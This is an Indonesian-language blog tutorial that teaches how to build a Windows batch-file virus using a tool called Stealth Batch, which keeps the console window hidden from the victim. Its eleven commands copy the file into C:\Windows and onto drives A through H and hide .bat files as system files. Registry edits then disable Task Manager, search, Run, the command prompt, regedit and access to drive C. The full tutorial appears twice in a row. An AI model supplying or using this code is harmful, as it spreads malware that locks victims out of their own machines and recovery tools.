Virus batch adalah file atau script yang sangat sederhana dan berisi perintah-perintah yang dijankan melalui command prompt samah halnya dengan Membuat virus menggunakan notepad. Dengan memanfaatkan file batch ini, sebuah virus atau worm dapat diciptakan namun program *.bat memiliki sedikit kekurangan. Setiap kali dijalankan, program bat ini akan membuka windows MS-DOS console secara otomatis yang tentunya akan mencurigakan korban. Namun pada Tutorial Virus kali ini saya menjelaskan tentang namun menggunakan sebuah software yaitu Stealth Batch agar saat dijalankan virus ini tidak akan membuka MS-DOS console. Program ini mirip dengan sebuah notepad. Baiklah saatnya kita mencoba membuat sebuah virus sederhana dengan mengguakan Stalth Batch.
Pertama buka program Stelath Batch
Lalu tuliskan perintah, seperti contoh:
1.Echo off > C:\Gueadi.txt
echo berfungsi untuk menampilkan pesan atau komentar yang diberikan user. Untuk lebih nyaman waktu tampil di command promt tambahkan “off” sehingga menjadi echo off
2.if no exist C:\Windows\%0 copy %0 C:\Windows
digunakan agar virus memeriksa dirinya atau kembarannya yang telah berada diderektori C:\Windows .Jika nggak ada maka akan Mengcopy kederiktori tersebut. %0 digunakan untuk menghandle nama dirinya sendiri
3.for %%p in (A C D E F G H) do copy %0 %%p:
digunakan untuk pengcopyan file virus ke drive A, C, D, E, F, G, dan H. perintah itu kita menggunakan perulangan agar penulisannya dapat dipersingkat. %%variabel atau %%p diatas adalah untuk menangani file dengan nama yang terlalu panjang, dan %0 untuk menghandle dirinya sendiri
4.for %%r in (A C D E F G H) do attrib +h +s %%r:\*.bat /s
untuk menyembunyikan file berekstensi *.bat. penyembunyiannya tidak hanya dalam mode hiden biasa tapi dalam super hiden. Perintah +h dan +s untuk memasang atribun hiden dan system hiden sedang perintah /S untuk proses attrib hingga subfolder.
Anda bahkan dapat merubah registry dari windows dengan perintah bacth.
5.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f
untuk memberikan nilai DWORD 0 untuk value ShowSuperHiden. Maka semua file yang beratribut system file tidak akan ditampakkan. Untuk mengembalikannya, ganti nilai 0 tersebut menjadi nilai 1
6.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
untuk melarang akses task manager. Nilai 1 untuk mendisable task manager, untuk megembalikannya agar bisa gunakan ganti nilai 1 menjadi 0
7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
untuk menon aktifkan fasilitas pencarian atau search, untuk mengembalikan sama kayak perintah lainnya, tinggal ganti angka 1 menjadi 0
8.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
fungsinya untuk menghilangkan fasilitas run pada Ms. Windows
9.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
untuk mencegah akses user ke drive C. Nilai 4 maksudnya drive yang dilarang adalah drive C, jika nilai 8 maka drive yang dilarang adalah drive D.
10. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f
untuk mencegah penggunaan Comand Promt oleh user. Nilai 2 agar Command Promt tidak bisa diakses, namun file batch dapat jalan. Sedang nilai 0 akan menjalankan command promd dan file batch. Dan nilai 1 untuk mendisable keduanya
11.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f
untuk mengunci Registry Editor atau regedit agar tidak bisa diakses. Ganti aja nilai 1 jadi 0 untuk dapat mengakses lagi.
Selain itu anda dapat memanfaatkan Rundll32 untuk mengakses berbagai fungsi windows.
Anda Dapat mendownload Stealth Batch disini
Pertama buka program Stelath Batch
Lalu tuliskan perintah, seperti contoh:
1.Echo off > C:\Gueadi.txt
echo berfungsi untuk menampilkan pesan atau komentar yang diberikan user. Untuk lebih nyaman waktu tampil di command promt tambahkan “off” sehingga menjadi echo off
2.if no exist C:\Windows\%0 copy %0 C:\Windows
digunakan agar virus memeriksa dirinya atau kembarannya yang telah berada diderektori C:\Windows .Jika nggak ada maka akan Mengcopy kederiktori tersebut. %0 digunakan untuk menghandle nama dirinya sendiri
3.for %%p in (A C D E F G H) do copy %0 %%p:
digunakan untuk pengcopyan file virus ke drive A, C, D, E, F, G, dan H. perintah itu kita menggunakan perulangan agar penulisannya dapat dipersingkat. %%variabel atau %%p diatas adalah untuk menangani file dengan nama yang terlalu panjang, dan %0 untuk menghandle dirinya sendiri
4.for %%r in (A C D E F G H) do attrib +h +s %%r:\*.bat /s
untuk menyembunyikan file berekstensi *.bat. penyembunyiannya tidak hanya dalam mode hiden biasa tapi dalam super hiden. Perintah +h dan +s untuk memasang atribun hiden dan system hiden sedang perintah /S untuk proses attrib hingga subfolder.
Anda bahkan dapat merubah registry dari windows dengan perintah bacth.
5.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHiden /t REG_DWORD /d 0 /f
untuk memberikan nilai DWORD 0 untuk value ShowSuperHiden. Maka semua file yang beratribut system file tidak akan ditampakkan. Untuk mengembalikannya, ganti nilai 0 tersebut menjadi nilai 1
6.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
untuk melarang akses task manager. Nilai 1 untuk mendisable task manager, untuk megembalikannya agar bisa gunakan ganti nilai 1 menjadi 0
7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
untuk menon aktifkan fasilitas pencarian atau search, untuk mengembalikan sama kayak perintah lainnya, tinggal ganti angka 1 menjadi 0
8.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
fungsinya untuk menghilangkan fasilitas run pada Ms. Windows
9.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
untuk mencegah akses user ke drive C. Nilai 4 maksudnya drive yang dilarang adalah drive C, jika nilai 8 maka drive yang dilarang adalah drive D.
10. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d 2 /f
untuk mencegah penggunaan Comand Promt oleh user. Nilai 2 agar Command Promt tidak bisa diakses, namun file batch dapat jalan. Sedang nilai 0 akan menjalankan command promd dan file batch. Dan nilai 1 untuk mendisable keduanya
11.REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegedit /t REG_DWORD /d 1 /f
untuk mengunci Registry Editor atau regedit agar tidak bisa diakses. Ganti aja nilai 1 jadi 0 untuk dapat mengakses lagi.
Selain itu anda dapat memanfaatkan Rundll32 untuk mengakses berbagai fungsi windows.
Anda Dapat mendownload Stealth Batch disini
{ 0 komentar... Views All / Send Comment! }
Post a Comment